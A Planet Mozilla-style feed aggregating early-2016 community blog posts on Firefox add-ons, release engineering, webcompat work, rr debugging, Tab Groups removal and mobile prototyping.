Cameron KaiserImagine there's no Intel transition ...

... and with a 12-core POWER8 workstation, it's easy if you try. Reported to me by a user is the Raptor Engineering Talos Secure Workstation, the first POWER workstation I've seen in years since the last of the PowerPC Intellistations. You can sign up for preorders so they know you're interested. (I did, of course. Seriously. In fact, I'm actually considering buying two, one as a workstation and the second as a new home server.) Since it's an ATX board, you can just stick it in any case you like with whatever power supply and options you want and configure to taste.

Before you start hyperventilating over the $3100 estimated price (which includes the entry-level 8-core CPU), remember that the Quad G5, probably the last major RISC workstation, cost $3300 new and this monster would drive it into the ground. Plus, at "only" 130 watts TDP, it certainly won't run anywhere near as hot as the G5 did either. Likely it will run some sort of Linux, though I can't imagine with its open architecture that the *BSDs wouldn't be on it like a toupee on William Shatner. Let's hope they get enough interest to produce a few, because I'd love to have an excuse to buy one and I don't need much of an excuse.

Mozilla Addons BlogHi, I’m Your New AMO Editor

jetpackYou may have wondered who this “Scott DeVaney” is who posted February’s featured add-ons. Well it’s me. I just recently joined AMO as your new Editorial & Campaign Manager. But I’m not new to Mozilla; I’ve spent the past couple years managing editorial for Firefox Marketplace.

This is an exciting deal, because my job will be to not only maintain the community-driven editorial processes we have in place today, but to grow the program and build new endeavors designed to introduce even more Firefox users to the wonders of add-ons.

In terms of background, I’ve been editorializing digital content since 1999 when I got my first internet job as a video game editor for the now-dead That led to other editorial gigs at DailyRadar, AtomFilms, Shockwave, Comedy Central, and iTunes (before all that I spent a couple years working as a TV production grunt where my claim to fame is breaking up a cast brawl on the set of Saved by the Bell—The New Class; but that’s a story for a different blog.)

I’m sdevaney on IRC, so don’t be a stranger.

Mozilla Addons BlogAdd-on Compatibility for Firefox 45

Firefox 45 will be released on March 8th. Here’s the list of changes that went into this version that can affect add-on compatibility. There is more information available in Firefox 45 for Developers, so you should also give it a look.





  • Firefox is currently enforcing add-on signing, with a preference to override it. Firefox 46 will remove the preference entirely , which means your add-on will need to be signed in order to run in release versions of Firefox. You can read about your options here.


  • Support a simplified JSON add-on update protocol. Firefox now supports a JSON update file for add-ons that manage their own automatic updates, as an alternative to the existing XML format. For new add-ons, we suggest using the JSON format. You shouldn’t immediately switch for older add-ons until most of your users are on 45 and later.

Let me know in the comments if there’s anything missing or incorrect on these lists. If your add-on breaks on Firefox 45, I’d like to know.

The automatic compatibility validation and upgrade for add-ons on AMO will happen in the coming weeks, so keep an eye on your email if you have an add-on listed on our site with its compatibility set to Firefox 44.

Daniel PocockGiving up democracy to get it back

Do services like Facebook and Twitter really help worthwhile participation in democracy, or are they the most sinister and efficient mechanism ever invented to control people while giving the illusion that they empower us?

Over the last few years, groups on the left and right of the political spectrum have spoken more and more loudly about the problems in the European Union. Some advocate breaking up the EU, while behind the scenes milking it for every handout they can get. Others seek to reform it from within.

Yanis Varoufakis on motorbike

Most recently, former Greek finance minister Yanis Varoufakis has announced plans to found a movement (not a political party) that claims to "democratise" the EU by 2025. Ironically, one of his first steps has been to create a web site directing supporters to Facebook and Twitter. A groundbreaking effort to put citizens back in charge? Or further entangling activism in the false hope of platforms that are run for profit by their Silicon Valley overlords? A Greek tragedy indeed, in the classical sense.

Varoufakis rails against authoritarian establishment figures who don't put the citizens' interests first. Ironically, big data and the cloud are a far bigger threat than Brussels. The privacy and independence of each citizen is fundamental to a healthy democracy. Companies like Facebook are obliged - by law and by contract - to service the needs of their shareholders and advertisers paying to study and influence the poor user. If "Facebook privacy" settings were actually credible, who would want to buy their shares any more?

Facebook is more akin to an activism placebo: people sitting in their armchair clicking to "Like" whales or trees are having hardly any impact at all. Maintaining democracy requires a sufficient number of people to be actively involved, whether it is raising funds for worthwhile causes, scrutinizing the work of our public institutions or even writing blogs like this. Keeping them busy on Facebook and Twitter renders them impotent in the real world (but please feel free to alert your friends with a tweet)

Big data is one of the areas that requires the greatest scrutiny. Many of the professionals working in the field are actually selling out their own friends and neighbours, their own families and even themselves. The general public and the policy makers who claim to represent us are oblivious or reckless about the consequences of this all-you-can-eat feeding frenzy on humanity.

Pretending to be democratic is all part of the illusion. Facebook's recent announcement to deviate from their real-name policy is about as effective as using sunscreen to treat HIV. By subjecting themselves to the laws of Facebook, activists have simply given Facebook more status and power.

Data means power. Those who are accumulating it from us, collecting billions of tiny details about our behavior, every hour of every day, are fortifying a position of great strength with which they can personalize messages to condition anybody, anywhere, to think the way they want us to. Does that sound like the route to democracy?

I would encourage Mr Varoufakis to get up to speed with Free Software and come down to Zurich next week to hear Richard Stallman explain it the day before launching his DiEM25 project in Berlin.

Will the DiEM25 movement invite participation from experts on big data and digital freedom and make these issues a core element of their promised manifesto? Is there any credible way they can achieve their goal of democracy by 2025 without addressing such issues head-on?

Or put that the other way around: what will be left of democracy in 2025 if big data continues to run rampant? Will it be as distant as the gods of Greek mythology?

Chris CooperRelEng & RelOps Weekly Highlights - February 5, 2016

This week, we have two new people starting in Release Engineering: Aki Sasaki (:aki) and Rok Garbas (:garbas). Please stop by #releng and say hi!

Modernize infrastructure:

This week, Jake and Mark added support to runner for our Windows 2008 instances running in Amazon. This is an important step towards parity with our Linux instances in that it allows our Windows instances to check when a newer AMI is available and terminate themselves to be re-created with the new image. Until now, we’ve need to manually refresh the whole pool to pick up changes, so this is a great step forward.

Also on the Windows virtualization front, Rob and Mark turned on puppetization of Windows 2008 golden AMIs this week. This particular change has taken a long time to make it to production, but it’s hard to overstate the importance of this development. Windows is definitely *not* designed to manage its configuration via puppet, but being able to use that same configuration system across both our POSIX and Windows systems will hopefully decrease the time required to update our reference platforms by substantially reducing the cognitive overhead required for configuration changes. Anyone who remembers our days using OPSI will hopefully agree.

Improve CI pipeline:

Ben landed a Balrog patch that implements JSONSchemas for Balrog Release objects. This will help ensure that data entering the system is more consistent and accurate, and allows humans and other systems that talk to Balrog to be more confident about the data they’ve constructed before they submit it.

Ben also enabled caching for the Balrog admin application. This dramatically reduces the database and network load it uses, which makes it faster, more efficient, and less prone to update races.


We’re currently on beta 3 for the Firefox 45. After all the earlier work to unhork gtk3 (see last week’s update), it’s good to see the process humming along.

A small number of stability issues have precipitated a dot release for Firefox 44. A Firefox 44.0.1 release is currently in progress.


Kim implemented changes to consume SETA information for Android API 15+ data using data from API 11+ data until we have sufficient data for API 15+ test jobs. This reduced the number of high number of pending counts for the AWS instance types used by Android. (

Coop (hey, that’s me!) did a long-overdue pass of platform support triage. Lots of bugs got closed out (30+), a handful actually got fixed, and a collection of Windows test failures got linked together under a root cause (thanks, philor!). Now all we need to do is find time to tackle the root cause!

See you next week!

Air MozillaFoundation Demos February 5 2016

Foundation Demos February 5 2016 Mozilla Foundation Demos February 5 2016

Mozilla WebDev CommunityExtravaganza – February 2016

Once a month, web developers from across Mozilla get together to talk about the work that we’ve shipped, share the libraries we’re working on, meet new folks, and talk about whatever else is on our minds. It’s the Webdev Extravaganza! The meeting is open to the public; you should stop by!

You can check out the wiki page that we use to organize the meeting, or view a recording of the meeting in Air Mozilla. Or just read on for a summary!

Shipping Celebration

The shipping celebration is for anything we finished and deployed in the past month, whether it be a brand new site, an upgrade to an existing one, or even a release of a library.

Git Submodules are Gone from MDN

First up was jezdez with news about MDN moving away from using git submodules to pull in dependencies. Instead, MDN now uses pip to pull in dependencies during deployment. Hooray!

Careers now on AWS/Deis

Next was giorgos who let us know that has moved over to the Engagement Engineering Deis cluster on AWS. For deployment, the site has Travis CI build a Docker image and run tests against it. If the tests pass, the image is deployed directly to Deis. Neat!

Privacy Day

jpetto helped ship the Privacy Day page. It includes a mailing list signup form as well as instructions for several platforms on how to update your software to stay secure.

Automated Functional Testing for

agibson shared news about the migration of previously-external functional tests for to live within the Bedrock repository itself. This allows us to run the tests, which previously were run by the WebQA team against live environments, whenever the site is deployed to dev, stage, or production. Having the functional tests be a part of the build pipeline ensures that developers are aware when the tests are broken and can fix them before deploying broken features. A slide deck is available with more details.

Peep 3.x

ErikRose shared news about the 3.0 (and 3.1) release of Peep, which helps smooth the transition from Peep to Pip 8, which now supports hashed requirements natively. The new Peep includes a peep port command for porting Peep-compatible requirements files to the new Pip 8 format.

Open-source Citizenship

Here we talk about libraries we’re maintaining and what, if anything, we need help with for them.


jezdez shared news about JazzBand, a cooperative experiment to reduce the stress of maintaining Open Source software alone. The group operates as a Github organization that anyone can join and transfer projects to. Anyone in the JazzBand can access JazzBand projects, allowing projects that would otherwise die due to lack of activity thrive thanks to the community of co-maintainers.

Notable projects already under the JazzBand include django-pipeline and django-configurations. The group is currently focused on Python projects and is still figuring out things like how to secure releases on PyPI.

django-configurations 1.0

Speaking of the JazzBand, members of the collective pushed out the 1.0 release of django-configurations, which is an opinionated library for writing class-based settings files for Django. The new release adds Django 1.8+ support as well as several new features.


The Roundtable is the home for discussions that don’t fit anywhere else.

Travis CI Sudo for Specific Environments

Next was ErikRose with an undocumented tip for Travis CI builds. As seen on the LetsEncrypt travis.yml, you can specify sudo: required for a specific entry in the build matrix to run only that build on Travis’ container-based infrastructure.

Docker on OS X via xhyve

Erik also shared xhyve, which is a lightweight OS X hypervisor. It’s a port of bhyve, and can be used as the backend for running Docker containers on OS X instead of VirtualBox. Recent changes that have made this more feasible include the removal of a 3 gigabyte RAM limit and experimental NFS support that, according to Erik, is faster than VirtualBox’s shared folder functionality. Check it out!

If you’re interested in web development at Mozilla, or want to attend next month’s Extravaganza, subscribe to the mailing list to be notified of the next meeting, and maybe send a message introducing yourself. We’d love to meet you!

See you next month!

Mozilla Security BlogMozilla Winter of Security-2015 MozDef: Virtual Reality Interface

Mozilla runs Winter of Security (MWoS) every year to give folks an opportunity to contribute to ongoing security projects in flight. This year an ambitious group took on the task of creating a new visual interface in our SIEM overlay for Elastic  Search that we call MozDef: The Mozilla Defense Platform.

Security personnel are in high demand and analyst skill sets are difficult to maintain. Rather than only focusing on making people better at security, I’m a firm believer that we need to make security better at people. Interfaces that are easier to comprehend and use seem to be a worthwhile investment in that effort and I’m thrilled with the work this team has done.

They’ve wrapped up their project with a great demo of their work. If you are interested in security automation tools and alternative user interfaces, take a couple minutes and check out their work over at air mozilla.


Air MozillaMozilla Winter of Security-2015 MozDef: Virtual Reality Interface

Mozilla Winter of Security-2015 MozDef: Virtual Reality Interface MWOS Students give an awesome demo of their work adding a unique interface to MozDef: The Mozilla Defense Platform.

Chris CooperWelcome (back), Aki!

Aki in Slave UnitThis actually is Aki.

In addition to Rok who also joined our team week, I’m ecstatic to welcome back Aki Sasaki to Mozilla release engineering.

If you’ve been a Mozillian for a while, Aki’s name should be familiar. In his former tenure in releng, he helped bootstrap the build & release process for both Fennec *and* FirefoxOS, and was also the creator of mozharness, the python-based script harness that has allowed us to push so much of our configuration back into the development tree. Essentially he was devops before it was cool.

Aki’s first task in this return engagement will be to figure out a generic way to interact with Balrog, the Mozilla update server, from TaskCluster. You can follow along in bug 1244181.

Welcome back, Aki!

Chris CooperWelcome, Rok!

The RockThis is *not* our Rok.

I’m happy to announce a new addition to the Mozilla release engineering. This week, we are lucky to welcome Rok Garbas to the team.

Rok is a huge proponent of Nix and NixOS. Whether we end up using those particular tools or not, we plan to leverage his experience with reproducible development/production environments to improve our service deployment story in releng. To that end, he’s already working with Dustin who has also been thinking about this for a while.

Rok’s first task is to figure out how the buildbot-era version of clobberer, a tool for clearing and resetting caches on build workers, can be rearchitected to work with TaskCluster. You can follow along in bug 1174263 if you’re interested.

Welcome, Rok!

Carsten BookSheriff Newsletter for January 2016

To give a little insight into our work and make our work more visible to our Community we decided to create a  monthly report of what’s going on in the Sheriffs Team.
If you have questions or feedback, just let us know!
In case you don’t know who the sheriffs are, or to check if there are current issues on the tree, see:
Topics of this month!
1. How-To article of the month
2. Get involved
3. Statistics for January
4. Orange Factor
5. Contact
1. How-To article of the month and notable things!
-> In the Sheriff Newsletter we mentioned the “Orange Factor” but what is this ?  It is simply the ratio of oranges (test failures) to test runs. The ideal value is, of course, zero.

Practically, this is virtually impossible for a code base of any substantial size,so it is a matter of policy as to what is an acceptable orange factor.

It is worth noting that the overall orange factor indicates nothing about the severity of the oranges. [4]

The main site where you can checkout the “Orange Factor” is at  and some interesting info’s are here
-> As you might be aware Firefox OS has moved into Tier 3 Support [5] – this means that there is no Sheriff Support anymore for the b2g-inbound tree.

Also with moving into tier-3 – b2g tests have also moved to tier 3 and this tests are by default “hidden” on treeherder. To view test results as example on treeherder for mozilla-central you need to click on the checkbox in the treeview “show/hide excluded jobs”.

2. Get involved!
Are you interested in helping out by becoming a Community Sheriff? Let us know!
3. Statistics
Intermittent Bugs filed in January  [1]: 667
and of those are closed: 107 [2]
For Tree Closing times and reasons see:
4. Orange Factor
Current Orangefactor [3]: 12.92
5.  How to contact us
There are a lot of ways to contact us. The fastest one is to contact
the sheriff on duty (the one with the |sheriffduty tag on their nick
:) or by emailing sheriffs @ mozilla dot org.

Karl Dubost[worklog] Outreach is hard, Webkit aliasing big progress

Tunes of the week: Earth, Wind and Fire. Maurice White, the founder, died at 74.

WebCompat Bugs

WebKit aliasing

  • When looking for usage of -webkit-mask-*, I remembered that Google Image was a big offender. So I tested again this morning and… delight! They now use SVG. So now, I need to test extensively Google search and check if they can just send us the version they send to Chrome.
  • Testing Google Calendar again on Gecko with Chrome user agent to see how far we are to receive a better user experience. We can't really yet ask Google to send us the same thing they send to Chrome. A couple of glitches here and there. But we are very close. The better would be for Google to fix their CSS, specifically to make flexbox and gradients standard-compatible.
  • The code for the max-width issue (not a bug but implementation differences due to an undefined scenario in the CSS specification) is being worked on by David Baron and reviewed by Daniel Holbert. And this makes me happy, it should solve a lot of the Webcompat bugs reports. Look at the list of SeeAlso in that bug.

Webcompat Life and Working with Developer Tools

  • Changing preferences all the time through "about:config" is multiple step. I liked in Opera Presto how you could link to a specific preference, so I filed a bug for Firefox. RESOLVED. It exists: about:config?filter=webkit and it's bookmark-able.
  • Bug 1245365 - searching attribute values through CSS selectors override the search terms
  • A discussion has been started on improving the Responsive Design Mode of Firefox Developer Tools. I suggested a (too big) list of features that would make my life easier.

Firefox OS Bugs to Firefox Android Bugs

  • Web Compatibility Mozilla employees reduced their support for solving Firefox OS bugs to its minimum. The community is welcome to continue to work on them. But some of these bugs have still an impact on Firefox Android. One good example of this is Bug 959137. Let's come up with a process to deal with those.
  • Another last week todo. I have been closing a lot of old bugs (around 600 in a couple of days) in Firefox OS and Firefox Android in Tech Evangelism product. The reasons for closing them are mostly:
    • the site doesn't exist anymore. (This goes into my list of Web Compatibility axioms: "Wait long enough, every bug disappears.")
    • the site fixed the initial issue
    • the layout.css.prefixes.webkit; true fixes it (see Bug 1213126)
    • the site has moved to a responsive design

Bug 812899 - absolutely positioned element should be vertically centered even if the height is bigger than that of the containing block

This bug was simple at the beginning, but when providing the fix, it broke other tests. It's normal. Boris explained which parts of the code was impacted. But I don't feel I'm good enough yet for touching this. Or it would require patience and step by step guidance. It could be interesting though. I have the feeling I have too much on my plate right now. So a bug to take over!

Testing Google Search On Gecko With Different UA Strings

So last week, I gave myself a Todo "testing Google search properties and see if we can find a version which is working better on Firefox Android than the current default version sent by Google. Maybe testing with Chrome UA and Iphone UA." My preliminary tests sound pretty good.

Reading List

Follow Your Nose


Karl DubostSteps Before Considering a Bug "Ready for Outreach"

Sometimes another team of Mozilla will ask help from Webcompat team for contacting site owners to fix an issue on their Web site which hinders the user experience on Firefox. Let's go through some tips to maximize the chances of getting results when we outreach.

Bug detection


A bug has been reported by a user or a colleague. They probably had the issue at the moment they tested. The source of the issue is still quite unknown. Network glitch, specific addon configuration, particular version of Firefox, broken build of Nightly. Assess if the bug is reproducible in the most neutral possible environment. And if it's not already done, write in the comments "Steps to reproduce" and describe all the steps required to reproduce the bug.

Analyzing the issue


You have been able to reproduce. It is time to understand it. Explain it in very clear terms. Think about the person on the other hand who will need to fix the bug. This person might not be an English native speaker. This person might not be as knowledgeable as you for Web technologies. Provide links and samples to the code with the issue at stake. This will help the person to find the appropriate place in the code.

Providing a fix for the issue


When explaining the issue, you might have also find out how to fix it or at least one way to fix it. It might not be the way the contacted person will fix it. We do not know their tools, but it will help them to create an equivalent fix that fits in their process. If your proposal is a better practice explained why it is beneficial for performance, longevity, resilience, etc.

Partly a Firefox bug


The site is not working but it's not entirely their fault. Firefox changed behavior. The browser became more compliant. The feature had a bug which is in the process of being fixed. Think twice before asking for outreach. Sometimes it's just better to push a bit more on fixing the bug in Firefox. It has more chances to be useful for all the unknown sites using the feature. If the site is a big popular site, you might want to ask for outreach, but you need a very good incentive such as improving performances.

Provide a contact hint


If by chance, you already have contacts in this company, share the data, even try directly to contact that person. If you have information that even bookies don't know about the company, be sure to pass it on for maximizing the chances of outreach. The hardest part is often to find the right person who can help you fix the issue.

Outreach might fail

And here the dirty secret: The outreach might now work or might not be effective right away. Be patient. Be perseverant.


Fixing a Web site costs a lot more than you can imagine. Time and frustration are part of the equation. Outreach is not a magical bullet. Sometimes it takes months to years to fix an issue. Some reasons why the outreach might fail:

  • Impossible to find the right contacts. Sometimes you can send bug reports through the official channels of communications from the company and have your bug being ignored, misunderstood, unusual. For one site, I had reported for months through the bug reporting system until I finally decided to try a back door with emailing specifically a developer I happened to find the information online. The bug was fixed in a couple of days.
  • Developers have bosses. They first need to comply with what their bosses told them to do. They might not be in a very good position in the company, have conflicts with the management, etc. Or they just don't have the freedom to take the decision that will fix the issue, even a super simple one.
  • Another type of bosses is the client. The client had been sold a Web site with a certain budget. Maintenance is always a contentious issue. The Web agencies are not working for free and even if the bug is there in the first place. The client might not have asked for them to test in that specific browser. Channeling up a bug to the client will mean for the Web agency to bill the client. The client might not want to pay.
  • Sometimes, you will think that you got an easy win. The bug has been solved right away. What you do not know is that the developer in charge had just a put a hack in his code with a beautiful TOFIX that will be crushed at the next change of tools or updates.
  • You just need to upgrade to version X of your JS library: Updating the library will break everything else or will require to test all the zillion of other features that are using this lib in the rest of the site. In a cost/benefit scenario, you have to demonstrate to the dev that the fix is worth his time and the test.
  • Wrong department. Sometimes you get the press service, sometimes the communications department, sometimes the IT department in charge of the office backend or commercial operations systems, but not the Web site.
  • The twitter person is not techy. This happens very often. With the blossoming of social managers (do we still say that?), the people on the front-line are usually helpless when it's really technical. Your only chance is to convince them to communicate with the tech team. But the tech team is despising them because too often they brought bugs which were just useless. If the site is an airline company, a bank, a very consumers oriented service, just forget trying to contact them through twitter.
  • The twitter person is a bot. Check the replies on this twitter account, if there is no meaningful interaction with the public, just find another way.
  • You contacted. Nothing happened. People on the other side forget. I'm pretty sure you are also late replying this email or patching this annoying bug. People ;)
  • The site is just not maintained anymore. No budget. No team. No nobody for moving forward the issue.
  • You might have pissed off someone when contacting. You will never know why. Maybe it was not the right day, maybe it was something in your signature, maybe it was the way you addressed them. Be polite, have empathy.

In the end my message is look for the bare necessities of life.

Bugs images from American entomology : or description of the insects of North America, illustrated by coloured figures from original drawings executed from nature. Thanks to the New-York Public Library.


Mike HommeyGoing beyond NS_ProcessNextEvent

If you’ve been debugging Gecko, you’ve probably hit the frustration of having the code you’re inspecting being called asynchronously, and your stack trace rooting through NS_ProcessNextEvent, which means you don’t know at first glance how your code ended up being called in the first place.

Events running from the Gecko event loop are all nsRunnable instances. So at some level close to NS_ProcessNextEvent, in your backtrace, you will see Class::Run. If you’re lucky, you can find where the nsRunnable was created. But that requires the stars to be perfectly aligned. In many cases, they’re not.

There comes your savior: rr. If you don’t know it, check it out. The downside is that you must first rr record a Firefox session doing what you’re debugging. Then, rr replay will give you a debugger with the capabilities of a time machine.

Note, I’m kind of jinxed, I don’t do much C++ debugging these days, so every time I use rr replay, I end up hitting a new error. Tip #1: try again with rr’s current master. Tip #2: roc is very helpful. But my takeaway is that it’s well worth the trouble. It is a game changer for debugging.

Anyways, once you’re in rr replay and have hit your crasher or whatever execution path you’re interested in, and you want to go beyond that NS_ProcessNextEvent, here is what you can do:

(rr) break nsEventQueue.cpp:60
(rr) reverse-continue

(Adjust the line number to match wherever the *aResult = mHead->mEvents[mOffsetHead++]; line is in your tree).

(rr) disable
(rr) watch -l mHead->mEvents[mOffsetHead]
(rr) reverse-continue
(rr) disable

And there you are, you just found where the exact event that triggered the executed code you were looking at was put on the event queue. (assuming there isn’t a nested event loop processed during the first reverse-continue)

Rinse and repeat.

Robert O'Callahanrr Talk At

For the last few days I've been attending, and yesterday I gave a talk about rr. The talk is now online. It was a lot of fun and I got some good questions!

Mozilla Addons BlogFebruary 2016 Featured Add-ons

Pick of the Month: Proxy Switcher

by rNeomy
Access all of Firefox’s proxy settings right from the toolbar panel.

“Exactly what I need to switch on the fly from Uni/Work to home.”

Featured: cyscon Security Shield

by patugo GmbH
Cybercrime protection against botnets, malvertising, data breaches, phishing, and malware.

“The plugin hasn’t slowed down my system in any way. Was especially impressed with the Breach notification feature—pretty sure that doesn’t exist anywhere else.”

Featured: Decentraleyes

by Thomas Rientjes
Evade ad tracking without breaking the websites you visit. Decentraleyes works great with other content blockers.

“I’m using it in combination with uBlock Origin as a perfect complement.”

Featured: VimFx

by akhodakivkiy, lydell
Reduce mouse usage with these Vim-style keyboard shortcuts for browsing and navigation.

“It’s simple and the keybindings are working very well. Nice work!!”

Featured: Saved Password Editor

by Daniel Dawson
Adds the ability to create and edit entries in the password manager.

“Makes it very easy to login to any sight, saves the time of manually typing everything in.”

Nominate your favorite add-ons

Featured add-ons are selected by a community board made up of add-on developers, users, and fans. Board members change every six months, so there’s always an opportunity to participate. Stayed tuned to this blog for the next call for applications.

If you’d like to nominate an add-on for featuring, please send it to for the board’s consideration. We welcome you to submit your own add-on!

Support.Mozilla.OrgWhat’s up with SUMO – 4th February

Hello, SUMO Nation!

Last week went by like lightning, mainly due to FOSDEM 2016, but also due to the year speeding up – we’re already in February! What are the traditional festivals in your region this month? Let us know in the comments!

Welcome, new contributors!

If you just joined us, don’t hesitate – come over and say “hi” in the forums!

Contributors of the week

  • Philipp – for his continuous help with Firefox Desktop and many other aspects of Mozilla and SUMO – Vielen Dank!

We salute you!

Don’t forget that if you are new to SUMO and someone helped you get started in a nice way you can nominate them for the Buddy of the Month!

Most recent SUMO Community meeting

The next SUMO Community meeting…

  • is happening on Monday the 8th of February – join us!
  • Reminder: if you want to add a discussion topic to the upcoming meeting agenda:
    • Start a thread in the Community Forums, so that everyone in the community can see what will be discussed and voice their opinion here before Monday (this will make it easier to have an efficient meeting).
    • Please do so as soon as you can before the meeting, so that people have time to read, think, and reply (and also add it to the agenda).
    • If you can, please attend the meeting in person (or via IRC), so we can follow up on your discussion topic during the meeting with your feedback.




Support Forum

Knowledge Base


  • Please check the for iOS section below for an important announcement!


And that’s it – short and sweet for your reading pleasure. We hope you have a great weekend and we are looking forward to seeing you on Monday! Take it easy and keep rocking the helpful web. Over & out!

Air MozillaWeb QA Weekly Meeting, 04 Feb 2016

Web QA Weekly Meeting This is our weekly gathering of Mozilla'a Web QA team filled with discussion on our current and future projects, ideas, demos, and fun facts.

Air MozillaReps weekly, 04 Feb 2016

Reps weekly This is a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.

Gervase MarkhamMOSS Applications Still Open

I am currently running the MOSS (Mozilla Open Source Support) program, which is Mozilla’s program for assisting other projects in the open source ecosystem. We announced the first 7 awardees in December, giving away a total of US$533,000.

The application assessment process has been on hiatus while we focussed on getting the original 7 awardees paid, and while the committee were on holiday for Christmas and New Year. However, it has now restarted. So if you know of a software project that could do with some money and that Mozilla uses or relies on (note: that list is not exhaustive), now is the time to encourage them to apply. :-)

Gijs KruitboschWhy was Tab Groups (Panorama) removed?

Firefox 44 has been released, and it has started warning users of Tab Groups about its removal in Firefox 45. There were a number of reasons that led to the removal of Tab Groups. This post will aim to talk about each in a little bit more detail.

The removal happened in the context of “Great or Dead”, where we examine parts of Firefox, look at their cost/benefit balance, and sometimes decide to put resources into improving them, and sometimes decide to recognize that they don’t warrant that and remove that part of the browser.

For Tab Groups, here are some of the things we considered:

  • It had a lot of bugs. A number of serious issues relating to performance, a lot of its tests failed intermittently, group and window closing was buggy, as well as a huge pile of smaller issues: you couldn’t move tabs represented as large squares to groups represented as small squares; sometimes you could get stuck in it, or groups would randomly move ; and the list goes on – the quality simply wasn’t what it should be, considering we ship it to millions of users, which was part of the reason why it was hidden away as much as it was.
  • The Firefox team does not believe that the current UI is the best way to manage large numbers of tabs. Some of the user experience and design folks on our team have ideas in this area, and we may revisit “managing large numbers of tabs” at some point in the future. We do know that we wouldn’t choose to re-implement the same UI again. It wouldn’t make sense to heavily invest in a feature that we should be replacing with something else.
  • It was interfering with other important projects, like electrolysis (multi-process Firefox). When using separate processes for separate tabs, we need to make certain behaviours that used to be synchronous deal with being asynchronous. The way that Tab Groups’ UI was interwoven with the tabbed browser code, and the way the UI effectively hid all the tabs and showed thumbnails for all of them instead, made this harder for things like tab switching and tab closing.
  • It had a number of serious code architecture problems. Some of the animation and library choices caused intermittent issues for users as linked to earlier. All of the groups were stored with absolute pixel positions, creating issues if you change your window size, use a different screen or resolution, etc. When we added a warning banner to the bottom of the UI telling users we were going to remove it, that interfered with displaying search results. The code is very fragile.
  • It was a large feature. By removing tab groups we removed more than 24,000 lines of code from Firefox.

With all these issues in mind, we had to decide if it was better to invest in making it a great feature in Firefox, or remove the code and focus on other improvements to Firefox. When we investigated usage data, we found that only a extremely small fraction of Firefox users were making use of Tab Groups. Around 0.01%. Such low usage couldn’t justify the massive amount of work it would take to improve Tab Groups to an acceptable quality level, and so we chose to remove it.

If you use Tab Groups, don’t worry: we will preserve your data for you, and there are add-ons available that can make the transition completely painless.

Mike TaylorA quiz about ES2015 block-scoped function declarations (in a with block statement)

Quiz time, nerds.

Given the following bit of JS, what's the value of window.f when lol gets called outside of the with statement?

with (NaN) {
  window.f = 1;
  function lol(){window.f = 2};
  function lol(){window.f = 3};

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Trick question, your program crashed before it got to call lol()!

According to ES2015, it should be a SyntaxError, because you're redefining a function declaration in the same scope. Just like if you were re-declaring a let thingy more than once.

However, the real trick is that Chrome and Firefox will just ignore the first declaration so your program doesn't explode (for now, anyways). So the answer is really just 3 (which you probably guessed).


Not surprisingly there are sites out there that depend on this funky declared-my-function-twice-in-the-same-scope pattern. was one (bug here), but they were super cool and fixed their code already. The Akamai Media Player on (bug here) is another (classic move).

It would be really cool if browsers didn't have to do this, so if you know anybody who works on the Akamai Advanced Media Player, tell them to delete the second declaration of RecommendationsPlugin()? And if you see an error in Firefox that says redeclaration of block-scoped function 'coolDudeFunction' is deprecated, go fix that too — it might stop working one day.

Now don't forget to like and subscribe to my Youtube ES2016 Web Compat Pranks channel.

(The with(NaN){} bit isn't important, but it was lunch time when I wrote this.)

Darrin HeneinPrototyping Firefox Mobile (or, Designers Aren’t Magicians)

I like to prototype things. To me—and surely not me alone—design is how something looks, feels, and works. These are very hard to gauge just by looking at a screen. Impossible, some would argue. Designs (and by extension, designers) solve problems. They address real needs. During the creative process, I need to see them in action, to hold them in my hand, on the street and on the train. In real life. So, as often as not, I need to build something.

Recently we’ve been exploring a few interesting ideas for Firefox Mobile. One advantage we have, as a mobile browser, is the idea of context—we can know where you are, what time it is, what your network connection is like—and more so than on other platforms utilize that context to provide a better experience. Not many people shop at the mall or wait in line at the bank with their laptop open, but in many of Firefox’s primary markets, people will have their phone with them. Some of this context could help us surface better content or shortcuts in different situations… we think.

The first step was to decide on scope. I sketched a few of these ideas out and decided on which I would test as a proof of concept: location aware shortcut links, a grouped history view, and some attempt at time-of-day recommendations. I wanted to test these ideas with real data (which, in my opinion, is the only legitimate way to test features of this nature), so I needed to find a way to make my history and other browser data available to my prototype. This data is available in our native apps, so whatever form my prototype took it would need to have access to this data in some way. In many apps or products, the content is the primary focus of the experience, so making sure you shift from static/dummy content to real/dynamic content as quickly as possible is important. Hitting edge cases like ultra-long titles or poor-quality images are real problems your design should address, and these will surface far sooner if you’re able to see your design with real content.

Next I decided (quickly) on some technology. The only criteria here was to use things that would get me to a testable product as quickly as possible. That meant using languages I know, frameworks to take shortcuts, and to ask for help when I was beyond my expertise. Don’t waste time writing highly abstracted, super-modular code or designing an entire library of icons for your prototypes… take shortcuts, use open-source artwork or frameworks, and just write code that works.

I am most comfortable with web technologies—I do work at Mozilla, after all—so I figured I’d make something with HTML and CSS, and likely some Javascript. However, our mobile clients (Firefox for Android and Firefox for iOS) are written in native code. I carry an iPhone most days, so I looked at our iOS app, which is written in Swift. I figured I could swap out one of the views with a web view to display my own page, but I still needed some way to get my browsing data (history, bookmarks, etc.) down into that view. Turns out, the first step in my plan was a bit of a roadblock.

Thankfully, I work with a team of incredible engineers, and my oft-co-conspirator Steph said he could put something together later that week. It took him an afternoon, I think. Onward. Even if I thought I hack this together, I wasn’t sure, and didn’t want to waste time.

🔑 Whenever possible, use tools and frameworks you’ve used before. It sounds obvious, but I could tell you some horror stories of times where I wasted countless hours just trying to get something new to work. Save it for later.

In the meantime, I got my web stack all set up: using an off-the-shelf boilerplate for webpack and React (which I had used before), I got the skeleton of my idea together. Maybe overkill at this point, but having this in place would let me quickly swap new components in and out to test other ideas down the road, so I figured the investment was worth it. Because the location idea was not dependant on the users existing browser data, I could get started on that while Steph built the WebPanel for me.

Working for now in Firefox on the desktop, I used the Geolocation API to get the current coordinates of the user. Appending that to a Foursquare API url and performing a GET request, I now had a list of nearby locations. Using Lodash.js I filtered them to only include records with attached URLs, then sorted by proximity.

var query = "FoursquareAPI+MyClientID"

  var ll = position.coords.latitude + "," + position.coords.longitude
  $.get(query + ll, function(data) {
    data = _.filter(data.response.venues, function(venue){ 
        return venue.url != null 
      foursquareData: _.sortBy(data, function(venue){
        return venue.location.distance 


Step 1 of my prototype, done. Well, it worked in the desktop browser at least. I knew our mobile web view supported the same Geo API, so I was confident this would work there as well (and, it did).

